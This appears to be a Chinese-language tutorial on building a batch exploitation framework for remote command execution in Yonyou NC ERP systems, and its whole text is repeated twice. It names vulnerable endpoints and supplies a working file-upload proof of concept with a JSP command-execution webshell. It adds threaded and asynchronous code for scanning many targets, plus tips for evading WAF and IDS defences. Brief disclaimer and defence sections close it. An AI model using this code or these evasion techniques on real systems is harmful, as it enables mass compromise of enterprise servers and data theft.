1. 项目概述从单点突破到批量狩猎在甲方做安全运营或者乙方做渗透测试的朋友应该都对“用友NC”这个名字不陌生。它作为国内大型企业广泛使用的ERP系统一旦出现安全漏洞影响面往往是“核弹级”的。最近几年用友NC系列产品爆出的命令执行漏洞几乎成了红队演练和真实攻击中的“明星漏洞”从早期的反序列化到近期的文件上传、SQL注入导致的命令执行花样层出不穷。但今天我们不聊单个漏洞的利用。单个漏洞的利用就像猎人用弓箭瞄准一只兔子技术固然重要但效率有限。在真实的攻防对抗或大规模安全评估中面对成百上千个可能存在漏洞的用友NC系统我们需要的是“霰弹枪”甚至“自动化炮台”。这就是“批量漏洞挖掘”的核心价值将针对特定漏洞如用友NC命令执行的检测与利用能力进行工具化、自动化、批量化从而在短时间内对大量目标进行高效筛查和验证。这个项目的目标就是构建一套针对用友NC命令执行漏洞的批量挖掘框架。它不仅仅是一个扫描器更是一个包含信息收集、漏洞检测、利用验证、结果整理的全流程工具链。我们将深入拆解漏洞原理然后基于此设计高效的检测逻辑最后用代码将其实现并分享在实战中提升效率和绕过防护的“骚操作”。2. 漏洞原理深度解析为什么是命令执行在开始批量挖掘之前我们必须吃透漏洞本身。用友NC的命令执行漏洞根源多样但最终都通向同一个结果攻击者能够通过构造特定的HTTP请求在服务器端执行任意操作系统命令。这通常源于几个关键环节的失守2.1 常见漏洞入口点反序列化漏洞这是早期最经典的路径。用友NC基于Java开发大量使用Apache Commons Collections等库进行对象序列化传输。当程序对用户输入的反序列化过程没有严格限制时攻击者可以构造恶意的序列化数据利用ysoserial等工具生成在目标服务器上触发远程代码执行。这类漏洞的利用链Gadget Chain复杂但利用稳定通常出现在/servlet/~ic/bsh.servlet.BshServlet、/servlet/~ic/NCInvokerServlet等接口。文件上传漏洞这是近年来更常见的入口。用友NC提供了文件上传功能用于处理附件、图片等。如果对上传文件的类型、内容、路径校验不严攻击者可能上传一个包含恶意代码的JSP文件俗称“小马”然后通过Web直接访问这个文件从而获得命令执行能力。关键往往在于找到未授权或校验可绕过的上传点如某些老版本中的/portal/pt/upload接口。SQL注入导致的命令执行在某些特定场景下通过SQL注入获取数据库权限后如果数据库配置允许如SQL Server的xp_cmdshell、MySQL的into outfile写Webshell可以进一步将权限提升至操作系统命令执行。这条路径相对曲折但结合用友NC复杂的业务逻辑有时也能走通。2.2 从漏洞到命令执行的关键步骤无论入口如何最终实现命令执行都需要一个“跳板”。在Java Web环境中这个跳板通常是Runtime.getRuntime().exec()最直接的方式通过Java的Runtime类调用系统命令。ProcessBuilder另一种更灵活的执行系统进程的方式。JSP Webshell上传一个JSP文件其内容包含接收参数并执行命令的Java代码为攻击者提供一个持久的、交互式的控制面板。我们的批量检测工具其核心逻辑就是模拟攻击者向目标发送精心构造的HTTP请求这些请求旨在触发上述漏洞路径并根据服务器的响应来判断漏洞是否存在甚至验证命令是否成功执行。注意所有技术讨论仅限用于授权的安全测试、企业安全自查及法律许可范围内的学习研究。未经授权对任何系统进行测试均属违法行为。3. 批量挖掘框架设计与核心思路一个高效的批量挖掘框架不能只是简单循环调用单个POC概念验证代码。它需要像流水线一样各模块分工协作应对网络环境、目标差异、防护设备等复杂情况。3.1 框架核心模块我们的框架主要包含以下四个模块目标预处理模块输入接受IP列表、域名列表或CIDR格式的网段。处理进行端口扫描重点804438080等Web端口识别HTTP/HTTPS服务获取Banner信息如Server头、Set-Cookie中的JSESSIONID、NCI等特征初步筛选出可能为用友NC的系统。输出一个干净的、待检测的URL列表。漏洞检测引擎模块核心集成多个针对不同用友NC命令执行漏洞的POC。策略采用“指纹识别 - 精准检测”的策略。先通过少量特征请求如访问特定静态资源、错误页面判断目标NC的大致版本然后调用对应版本的POC进行检测避免盲目攻击提高效率和隐蔽性。并发控制实现可配置的并发线程/协程数平衡检测速度和目标负载。利用验证与交互模块功能对于检测出的漏洞提供基本的利用验证。例如执行一个无害的命令如whoami、echo [随机字符串]并尝试从响应中回显结果以确认漏洞真实可利用。扩展可集成简单的命令交互功能用于手动深入测试。结果生成与报告模块记录详细记录每个目标的检测过程、请求、响应、漏洞状态存在、不存在、疑似。输出生成结构化的报告如TXT、CSV、HTML格式包含目标URL、漏洞类型、风险等级、验证结果、复现请求等关键信息。3.2 技术选型与工具链编程语言Python 3是首选。生态丰富Requests, Scapy, BeautifulSoup等开发效率高适合快速构建原型和处理网络任务。网络请求库requests库是基础但需要处理会话Session、SSL验证、代理、超时、重试等复杂情况。对于高性能并发可以考虑aiohttp异步或grequests。并发模型对于IO密集型的网络扫描多线程threading或多进程multiprocessing是传统方案。我更推荐使用异步IOasyncio aiohttp它在高并发场景下资源开销更小性能更高。解析与匹配re正则表达式用于快速匹配响应中的特征字符串。lxml或BeautifulSoup用于解析复杂的HTML响应从中提取关键信息。命令行交互使用argparse或click库构建友好的命令行界面方便参数传递。4. 核心检测逻辑实现与代码剖析下面我们以一个经典的、基于文件上传的用友NC命令执行漏洞POC为例拆解其检测逻辑并展示如何将其集成到批量框架中。4.1 单点POC逻辑拆解假设我们针对的是某个版本用友NC的任意文件上传漏洞。手动利用步骤可能是构造一个HTTP POST请求上传一个包含JSP代码的文件。请求触发漏洞文件被写入Web可访问目录。访问上传成功的JSP文件传递命令参数并执行。自动化POC需要将这个过程精炼、可靠地实现import requests import time import random import hashlib def check_nc_upload_rce(target_url): 检测用友NC特定文件上传漏洞 :param target_url: 目标基础URL如 http://target.com:8080 :return: (bool, str) 是否存在漏洞 漏洞证明信息 # 1. 构造一个唯一的特征字符串用于后续验证命令是否执行 random_str ftest_{int(time.time())}_{random.randint(1000, 9999)} md5_str hashlib.md5(random_str.encode()).hexdigest()[:8] # 2. 准备要上传的JSP Webshell内容 # 这是一个极简的、用于回显命令执行结果的JSP webshell_content f % page importjava.io.* % % String cmd request.getParameter(cmd); if (cmd ! null) {{ Process p Runtime.getRuntime().exec(cmd); BufferedReader br new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line br.readLine()) ! null) {{ out.println(line); }} br.close(); }} % # 或者更隐蔽的只执行一个echo命令验证漏洞存在性 verify_content f % page importjava.io.* % % out.println({md5_str}); % # 3. 构造上传请求 upload_url f{target_url}/portal/pt/upload # 示例漏洞点实际需根据版本调整 headers { User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36, Accept: */*, } # 文件上传通常使用 multipart/form-data 格式 files { file: (test.jsp, verify_content, image/jpeg) # 尝试伪装文件类型 } data { someFormField: value # 根据实际表单字段填充 } try: # 禁用SSL警告和验证仅用于测试环境生产环境应谨慎 resp_upload requests.post(upload_url, filesfiles, datadata, headersheaders, verifyFalse, timeout15) # 4. 解析上传响应获取文件路径 # 实际响应可能返回JSON包含文件路径也可能是重定向需要具体分析 if resp_upload.status_code 200: # 假设响应中包含了上传后的访问路径这里需要根据实际漏洞调整解析逻辑 # 例如从JSON中解析upload_path resp_upload.json().get(path) # 这里我们假设一个常见的存储路径进行盲猜实际批量中需要更智能的判断 guessed_paths [ f{target_url}/portal/pt/test.jsp, f{target_url}/upload/test.jsp, f{target_url}/test.jsp ] for guessed_path in guessed_paths: resp_access requests.get(guessed_path, timeout10, verifyFalse) if md5_str in resp_access.text: # 找到回显漏洞确认存在且可利用 return True, f漏洞存在Webshell可访问: {guessed_path} (验证字符串: {md5_str}) # 如果所有猜测路径都未找到回显可能上传成功但路径不对或漏洞不存在 return False, 未检测到漏洞可能上传成功但访问路径未知 else: return False, f上传请求失败状态码: {resp_upload.status_code} except requests.exceptions.RequestException as e: return False, f请求过程发生异常: {e} except Exception as e: return False, f检测过程发生未知异常: {e}4.2 集成到批量框架在批量框架中我们需要将上述检测函数包装成一个可并发执行的任务。以下是使用concurrent.futures线程池的简单示例import concurrent.futures from queue import Queue import logging logging.basicConfig(levellogging.INFO, format%(asctime)s - %(levelname)s - %(message)s) def worker(target_queue, result_queue, timeout30): 工作线程函数从队列中取目标进行检测 while not target_queue.empty(): try: target_url target_queue.get_nowait() except Queue.Empty: break logging.info(f开始检测目标: {target_url}) is_vuln, message check_nc_upload_rce(target_url) result { url: target_url, is_vulnerable: is_vuln, detail: message } result_queue.put(result) if is_vuln: logging.warning(f[!] 发现漏洞: {target_url} - {message}) else: logging.info(f[-] 目标安全或检测失败: {target_url}) target_queue.task_done() def batch_scan(target_list, max_workers10): 批量扫描主函数 target_queue Queue() result_queue Queue() for target in target_list: target_queue.put(target) with concurrent.futures.ThreadPoolExecutor(max_workersmax_workers) as executor: # 提交多个worker任务 futures [executor.submit(worker, target_queue, result_queue) for _ in range(max_workers)] concurrent.futures.wait(futures) # 收集结果 results [] while not result_queue.empty(): results.append(result_queue.get()) return results # 使用示例 if __name__ __main__: targets [ http://192.168.1.100:8080, http://example.com:80, # ... 更多目标 ] vuln_results batch_scan(targets, max_workers20) for res in vuln_results: if res[is_vulnerable]: print(f漏洞目标: {res[url]} | 信息: {res[detail]})5. 实战进阶绕过防护与提升效率的技巧在真实网络环境中目标系统可能部署了WAF、入侵检测系统、流量监控等防护设备。简单的脚本很容易被拦截。此外面对数万目标效率就是生命。5.1 绕过常见防护策略流量特征模糊User-Agent轮换使用常见的浏览器UA列表而非固定的Python-requests。参数随机化对请求参数名、值进行随机化处理避免形成固定模式。请求延时在请求间加入随机延时模拟人工操作。HTTPS与证书处理妥善处理自签名证书避免因SSL错误导致请求失败。Payload变形与编码多重编码对JSP Webshell中的关键字符如,%,进行URL编码、Base64编码甚至双重编码。大小写转换HTTP方法、头部字段大小写混用如pOsT。空格替换使用、%20、%09Tab等多种方式替换空格。路径与参数探测目录Fuzz上传接口路径可能不是公开的需要结合字典进行模糊测试。参数Fuzz除了file可能还有其他参数控制上传行为需要探测。5.2 提升批量挖掘效率异步IO革命如前所述将同步的requests库替换为aiohttp可以轻松实现上千个并发连接速度提升一个数量级。智能指纹识别在发起攻击性POC前先用极少的请求进行指纹识别。例如通过/logo.png、/login.jsp等资源判断是否为用友NC及大致版本只对匹配的目标进行深度检测避免在无关系统上浪费资源。结果缓存与断点续扫将扫描结果和进度持久化如保存到SQLite数据库或文件支持中断后从上次进度继续扫描。分布式扫描当目标量极大时可以考虑将任务分发到多台机器上执行使用消息队列如Redis协调任务。5.3 一个简单的异步扫描示例骨架import aiohttp import asyncio import aiofiles async def check_single_target(session, target_url, semaphore): 异步检测单个目标 async with semaphore: # 控制并发量 try: # 1. 指纹识别 fingerprint_url f{target_url}/logo.png async with session.get(fingerprint_url, sslFalse) as resp: if resp.status 200: # 检查响应头或内容中的NC特征 # ... pass # 2. 漏洞检测 (伪代码) # upload_url f{target_url}/vuln/path # async with session.post(upload_url, datapayload) as resp: # ... 解析响应判断漏洞 await asyncio.sleep(0.1) # 轻微延时 except Exception as e: pass return target_url, result async def main(target_list): connector aiohttp.TCPConnector(limit100, sslFalse) # 调整连接限制 timeout aiohttp.ClientTimeout(total30) semaphore asyncio.Semaphore(50) # 控制每秒并发数 async with aiohttp.ClientSession(connectorconnector, timeouttimeout) as session: tasks [check_single_target(session, url, semaphore) for url in target_list] results await asyncio.gather(*tasks, return_exceptionsTrue) # 处理结果 vuln_list [] for res in results: if isinstance(res, tuple) and res[1] VULNERABLE: # 假设的返回值 vuln_list.append(res[0]) print(f发现 {len(vuln_list)} 个漏洞目标)6. 常见问题排查与防御视角6.1 扫描过程中常见问题问题现象可能原因排查思路所有目标返回连接超时网络不通、防火墙拦截、并发过高被屏蔽1. 用浏览器或curl手动测试一个目标。2. 降低并发数(max_workers)。3. 在请求中增加代理设置。检测到漏洞但无法验证WAF拦截了攻击Payload或访问请求1. 尝试对Payload进行编码、分割、混淆。2. 更换更隐蔽的Webshell代码如使用反射、自定义类加载器。3. 检查上传文件的访问路径是否正确可能文件名或目录被重命名。误报率高POC逻辑不严谨或目标存在干扰响应1. 优化POC的检测逻辑增加更多判断条件如检查响应时间、特定头信息。2. 引入“脏数据检测”先发送一个明显无效的请求观察正常响应模式。扫描速度慢网络延迟高、目标响应慢、单线程阻塞1. 切换到异步IO模型(asyncio)。2. 适当调整超时时间(timeout)避免长时间等待。3. 使用更快的DNS解析服务。6.2 从防御者角度看漏洞修复作为安全研究人员或企业运维了解攻击手法是为了更好地防御。针对此类批量漏洞挖掘防御方可以及时打补丁关注用友官方安全公告第一时间更新系统补丁这是最根本的解决方式。部署WAF/IPS配置针对性的规则拦截常见的攻击Payload和扫描器特征。网络层限制严格限制访问用友NC系统的IP来源仅对必要的工作站开放。应用层加固删除或禁用不必要的Servlet、组件和示例文件。对文件上传功能进行严格的白名单校验文件类型、内容、路径。对反序列化操作进行输入验证和使用安全的反序列化库。加强监控与告警在IDS/IPS或Web日志分析平台中建立针对“/upload”、“/servlet”、“.jsp”等关键路径的异常访问告警特别是短时间内来自同一源的大量探测请求。这个项目从单点漏洞分析出发最终构建了一个面向实战的批量挖掘框架。它涉及网络编程、并发处理、漏洞原理、绕过技巧等多个方面。真正掌握它不仅能提升你在渗透测试中的效率更能深刻理解攻击与防御的动态博弈。工具是死的思路是活的最重要的永远是不断跟进新的漏洞、研究新的 bypass 方法并将这些知识融入你的自动化流程中。
用友NC命令执行漏洞批量挖掘框架设计与实战
1. 项目概述从单点突破到批量狩猎在甲方做安全运营或者乙方做渗透测试的朋友应该都对“用友NC”这个名字不陌生。它作为国内大型企业广泛使用的ERP系统一旦出现安全漏洞影响面往往是“核弹级”的。最近几年用友NC系列产品爆出的命令执行漏洞几乎成了红队演练和真实攻击中的“明星漏洞”从早期的反序列化到近期的文件上传、SQL注入导致的命令执行花样层出不穷。但今天我们不聊单个漏洞的利用。单个漏洞的利用就像猎人用弓箭瞄准一只兔子技术固然重要但效率有限。在真实的攻防对抗或大规模安全评估中面对成百上千个可能存在漏洞的用友NC系统我们需要的是“霰弹枪”甚至“自动化炮台”。这就是“批量漏洞挖掘”的核心价值将针对特定漏洞如用友NC命令执行的检测与利用能力进行工具化、自动化、批量化从而在短时间内对大量目标进行高效筛查和验证。这个项目的目标就是构建一套针对用友NC命令执行漏洞的批量挖掘框架。它不仅仅是一个扫描器更是一个包含信息收集、漏洞检测、利用验证、结果整理的全流程工具链。我们将深入拆解漏洞原理然后基于此设计高效的检测逻辑最后用代码将其实现并分享在实战中提升效率和绕过防护的“骚操作”。2. 漏洞原理深度解析为什么是命令执行在开始批量挖掘之前我们必须吃透漏洞本身。用友NC的命令执行漏洞根源多样但最终都通向同一个结果攻击者能够通过构造特定的HTTP请求在服务器端执行任意操作系统命令。这通常源于几个关键环节的失守2.1 常见漏洞入口点反序列化漏洞这是早期最经典的路径。用友NC基于Java开发大量使用Apache Commons Collections等库进行对象序列化传输。当程序对用户输入的反序列化过程没有严格限制时攻击者可以构造恶意的序列化数据利用ysoserial等工具生成在目标服务器上触发远程代码执行。这类漏洞的利用链Gadget Chain复杂但利用稳定通常出现在/servlet/~ic/bsh.servlet.BshServlet、/servlet/~ic/NCInvokerServlet等接口。文件上传漏洞这是近年来更常见的入口。用友NC提供了文件上传功能用于处理附件、图片等。如果对上传文件的类型、内容、路径校验不严攻击者可能上传一个包含恶意代码的JSP文件俗称“小马”然后通过Web直接访问这个文件从而获得命令执行能力。关键往往在于找到未授权或校验可绕过的上传点如某些老版本中的/portal/pt/upload接口。SQL注入导致的命令执行在某些特定场景下通过SQL注入获取数据库权限后如果数据库配置允许如SQL Server的xp_cmdshell、MySQL的into outfile写Webshell可以进一步将权限提升至操作系统命令执行。这条路径相对曲折但结合用友NC复杂的业务逻辑有时也能走通。2.2 从漏洞到命令执行的关键步骤无论入口如何最终实现命令执行都需要一个“跳板”。在Java Web环境中这个跳板通常是Runtime.getRuntime().exec()最直接的方式通过Java的Runtime类调用系统命令。ProcessBuilder另一种更灵活的执行系统进程的方式。JSP Webshell上传一个JSP文件其内容包含接收参数并执行命令的Java代码为攻击者提供一个持久的、交互式的控制面板。我们的批量检测工具其核心逻辑就是模拟攻击者向目标发送精心构造的HTTP请求这些请求旨在触发上述漏洞路径并根据服务器的响应来判断漏洞是否存在甚至验证命令是否成功执行。注意所有技术讨论仅限用于授权的安全测试、企业安全自查及法律许可范围内的学习研究。未经授权对任何系统进行测试均属违法行为。3. 批量挖掘框架设计与核心思路一个高效的批量挖掘框架不能只是简单循环调用单个POC概念验证代码。它需要像流水线一样各模块分工协作应对网络环境、目标差异、防护设备等复杂情况。3.1 框架核心模块我们的框架主要包含以下四个模块目标预处理模块输入接受IP列表、域名列表或CIDR格式的网段。处理进行端口扫描重点804438080等Web端口识别HTTP/HTTPS服务获取Banner信息如Server头、Set-Cookie中的JSESSIONID、NCI等特征初步筛选出可能为用友NC的系统。输出一个干净的、待检测的URL列表。漏洞检测引擎模块核心集成多个针对不同用友NC命令执行漏洞的POC。策略采用“指纹识别 - 精准检测”的策略。先通过少量特征请求如访问特定静态资源、错误页面判断目标NC的大致版本然后调用对应版本的POC进行检测避免盲目攻击提高效率和隐蔽性。并发控制实现可配置的并发线程/协程数平衡检测速度和目标负载。利用验证与交互模块功能对于检测出的漏洞提供基本的利用验证。例如执行一个无害的命令如whoami、echo [随机字符串]并尝试从响应中回显结果以确认漏洞真实可利用。扩展可集成简单的命令交互功能用于手动深入测试。结果生成与报告模块记录详细记录每个目标的检测过程、请求、响应、漏洞状态存在、不存在、疑似。输出生成结构化的报告如TXT、CSV、HTML格式包含目标URL、漏洞类型、风险等级、验证结果、复现请求等关键信息。3.2 技术选型与工具链编程语言Python 3是首选。生态丰富Requests, Scapy, BeautifulSoup等开发效率高适合快速构建原型和处理网络任务。网络请求库requests库是基础但需要处理会话Session、SSL验证、代理、超时、重试等复杂情况。对于高性能并发可以考虑aiohttp异步或grequests。并发模型对于IO密集型的网络扫描多线程threading或多进程multiprocessing是传统方案。我更推荐使用异步IOasyncio aiohttp它在高并发场景下资源开销更小性能更高。解析与匹配re正则表达式用于快速匹配响应中的特征字符串。lxml或BeautifulSoup用于解析复杂的HTML响应从中提取关键信息。命令行交互使用argparse或click库构建友好的命令行界面方便参数传递。4. 核心检测逻辑实现与代码剖析下面我们以一个经典的、基于文件上传的用友NC命令执行漏洞POC为例拆解其检测逻辑并展示如何将其集成到批量框架中。4.1 单点POC逻辑拆解假设我们针对的是某个版本用友NC的任意文件上传漏洞。手动利用步骤可能是构造一个HTTP POST请求上传一个包含JSP代码的文件。请求触发漏洞文件被写入Web可访问目录。访问上传成功的JSP文件传递命令参数并执行。自动化POC需要将这个过程精炼、可靠地实现import requests import time import random import hashlib def check_nc_upload_rce(target_url): 检测用友NC特定文件上传漏洞 :param target_url: 目标基础URL如 http://target.com:8080 :return: (bool, str) 是否存在漏洞 漏洞证明信息 # 1. 构造一个唯一的特征字符串用于后续验证命令是否执行 random_str ftest_{int(time.time())}_{random.randint(1000, 9999)} md5_str hashlib.md5(random_str.encode()).hexdigest()[:8] # 2. 准备要上传的JSP Webshell内容 # 这是一个极简的、用于回显命令执行结果的JSP webshell_content f % page importjava.io.* % % String cmd request.getParameter(cmd); if (cmd ! null) {{ Process p Runtime.getRuntime().exec(cmd); BufferedReader br new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line br.readLine()) ! null) {{ out.println(line); }} br.close(); }} % # 或者更隐蔽的只执行一个echo命令验证漏洞存在性 verify_content f % page importjava.io.* % % out.println({md5_str}); % # 3. 构造上传请求 upload_url f{target_url}/portal/pt/upload # 示例漏洞点实际需根据版本调整 headers { User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36, Accept: */*, } # 文件上传通常使用 multipart/form-data 格式 files { file: (test.jsp, verify_content, image/jpeg) # 尝试伪装文件类型 } data { someFormField: value # 根据实际表单字段填充 } try: # 禁用SSL警告和验证仅用于测试环境生产环境应谨慎 resp_upload requests.post(upload_url, filesfiles, datadata, headersheaders, verifyFalse, timeout15) # 4. 解析上传响应获取文件路径 # 实际响应可能返回JSON包含文件路径也可能是重定向需要具体分析 if resp_upload.status_code 200: # 假设响应中包含了上传后的访问路径这里需要根据实际漏洞调整解析逻辑 # 例如从JSON中解析upload_path resp_upload.json().get(path) # 这里我们假设一个常见的存储路径进行盲猜实际批量中需要更智能的判断 guessed_paths [ f{target_url}/portal/pt/test.jsp, f{target_url}/upload/test.jsp, f{target_url}/test.jsp ] for guessed_path in guessed_paths: resp_access requests.get(guessed_path, timeout10, verifyFalse) if md5_str in resp_access.text: # 找到回显漏洞确认存在且可利用 return True, f漏洞存在Webshell可访问: {guessed_path} (验证字符串: {md5_str}) # 如果所有猜测路径都未找到回显可能上传成功但路径不对或漏洞不存在 return False, 未检测到漏洞可能上传成功但访问路径未知 else: return False, f上传请求失败状态码: {resp_upload.status_code} except requests.exceptions.RequestException as e: return False, f请求过程发生异常: {e} except Exception as e: return False, f检测过程发生未知异常: {e}4.2 集成到批量框架在批量框架中我们需要将上述检测函数包装成一个可并发执行的任务。以下是使用concurrent.futures线程池的简单示例import concurrent.futures from queue import Queue import logging logging.basicConfig(levellogging.INFO, format%(asctime)s - %(levelname)s - %(message)s) def worker(target_queue, result_queue, timeout30): 工作线程函数从队列中取目标进行检测 while not target_queue.empty(): try: target_url target_queue.get_nowait() except Queue.Empty: break logging.info(f开始检测目标: {target_url}) is_vuln, message check_nc_upload_rce(target_url) result { url: target_url, is_vulnerable: is_vuln, detail: message } result_queue.put(result) if is_vuln: logging.warning(f[!] 发现漏洞: {target_url} - {message}) else: logging.info(f[-] 目标安全或检测失败: {target_url}) target_queue.task_done() def batch_scan(target_list, max_workers10): 批量扫描主函数 target_queue Queue() result_queue Queue() for target in target_list: target_queue.put(target) with concurrent.futures.ThreadPoolExecutor(max_workersmax_workers) as executor: # 提交多个worker任务 futures [executor.submit(worker, target_queue, result_queue) for _ in range(max_workers)] concurrent.futures.wait(futures) # 收集结果 results [] while not result_queue.empty(): results.append(result_queue.get()) return results # 使用示例 if __name__ __main__: targets [ http://192.168.1.100:8080, http://example.com:80, # ... 更多目标 ] vuln_results batch_scan(targets, max_workers20) for res in vuln_results: if res[is_vulnerable]: print(f漏洞目标: {res[url]} | 信息: {res[detail]})5. 实战进阶绕过防护与提升效率的技巧在真实网络环境中目标系统可能部署了WAF、入侵检测系统、流量监控等防护设备。简单的脚本很容易被拦截。此外面对数万目标效率就是生命。5.1 绕过常见防护策略流量特征模糊User-Agent轮换使用常见的浏览器UA列表而非固定的Python-requests。参数随机化对请求参数名、值进行随机化处理避免形成固定模式。请求延时在请求间加入随机延时模拟人工操作。HTTPS与证书处理妥善处理自签名证书避免因SSL错误导致请求失败。Payload变形与编码多重编码对JSP Webshell中的关键字符如,%,进行URL编码、Base64编码甚至双重编码。大小写转换HTTP方法、头部字段大小写混用如pOsT。空格替换使用、%20、%09Tab等多种方式替换空格。路径与参数探测目录Fuzz上传接口路径可能不是公开的需要结合字典进行模糊测试。参数Fuzz除了file可能还有其他参数控制上传行为需要探测。5.2 提升批量挖掘效率异步IO革命如前所述将同步的requests库替换为aiohttp可以轻松实现上千个并发连接速度提升一个数量级。智能指纹识别在发起攻击性POC前先用极少的请求进行指纹识别。例如通过/logo.png、/login.jsp等资源判断是否为用友NC及大致版本只对匹配的目标进行深度检测避免在无关系统上浪费资源。结果缓存与断点续扫将扫描结果和进度持久化如保存到SQLite数据库或文件支持中断后从上次进度继续扫描。分布式扫描当目标量极大时可以考虑将任务分发到多台机器上执行使用消息队列如Redis协调任务。5.3 一个简单的异步扫描示例骨架import aiohttp import asyncio import aiofiles async def check_single_target(session, target_url, semaphore): 异步检测单个目标 async with semaphore: # 控制并发量 try: # 1. 指纹识别 fingerprint_url f{target_url}/logo.png async with session.get(fingerprint_url, sslFalse) as resp: if resp.status 200: # 检查响应头或内容中的NC特征 # ... pass # 2. 漏洞检测 (伪代码) # upload_url f{target_url}/vuln/path # async with session.post(upload_url, datapayload) as resp: # ... 解析响应判断漏洞 await asyncio.sleep(0.1) # 轻微延时 except Exception as e: pass return target_url, result async def main(target_list): connector aiohttp.TCPConnector(limit100, sslFalse) # 调整连接限制 timeout aiohttp.ClientTimeout(total30) semaphore asyncio.Semaphore(50) # 控制每秒并发数 async with aiohttp.ClientSession(connectorconnector, timeouttimeout) as session: tasks [check_single_target(session, url, semaphore) for url in target_list] results await asyncio.gather(*tasks, return_exceptionsTrue) # 处理结果 vuln_list [] for res in results: if isinstance(res, tuple) and res[1] VULNERABLE: # 假设的返回值 vuln_list.append(res[0]) print(f发现 {len(vuln_list)} 个漏洞目标)6. 常见问题排查与防御视角6.1 扫描过程中常见问题问题现象可能原因排查思路所有目标返回连接超时网络不通、防火墙拦截、并发过高被屏蔽1. 用浏览器或curl手动测试一个目标。2. 降低并发数(max_workers)。3. 在请求中增加代理设置。检测到漏洞但无法验证WAF拦截了攻击Payload或访问请求1. 尝试对Payload进行编码、分割、混淆。2. 更换更隐蔽的Webshell代码如使用反射、自定义类加载器。3. 检查上传文件的访问路径是否正确可能文件名或目录被重命名。误报率高POC逻辑不严谨或目标存在干扰响应1. 优化POC的检测逻辑增加更多判断条件如检查响应时间、特定头信息。2. 引入“脏数据检测”先发送一个明显无效的请求观察正常响应模式。扫描速度慢网络延迟高、目标响应慢、单线程阻塞1. 切换到异步IO模型(asyncio)。2. 适当调整超时时间(timeout)避免长时间等待。3. 使用更快的DNS解析服务。6.2 从防御者角度看漏洞修复作为安全研究人员或企业运维了解攻击手法是为了更好地防御。针对此类批量漏洞挖掘防御方可以及时打补丁关注用友官方安全公告第一时间更新系统补丁这是最根本的解决方式。部署WAF/IPS配置针对性的规则拦截常见的攻击Payload和扫描器特征。网络层限制严格限制访问用友NC系统的IP来源仅对必要的工作站开放。应用层加固删除或禁用不必要的Servlet、组件和示例文件。对文件上传功能进行严格的白名单校验文件类型、内容、路径。对反序列化操作进行输入验证和使用安全的反序列化库。加强监控与告警在IDS/IPS或Web日志分析平台中建立针对“/upload”、“/servlet”、“.jsp”等关键路径的异常访问告警特别是短时间内来自同一源的大量探测请求。这个项目从单点漏洞分析出发最终构建了一个面向实战的批量挖掘框架。它涉及网络编程、并发处理、漏洞原理、绕过技巧等多个方面。真正掌握它不仅能提升你在渗透测试中的效率更能深刻理解攻击与防御的动态博弈。工具是死的思路是活的最重要的永远是不断跟进新的漏洞、研究新的 bypass 方法并将这些知识融入你的自动化流程中。
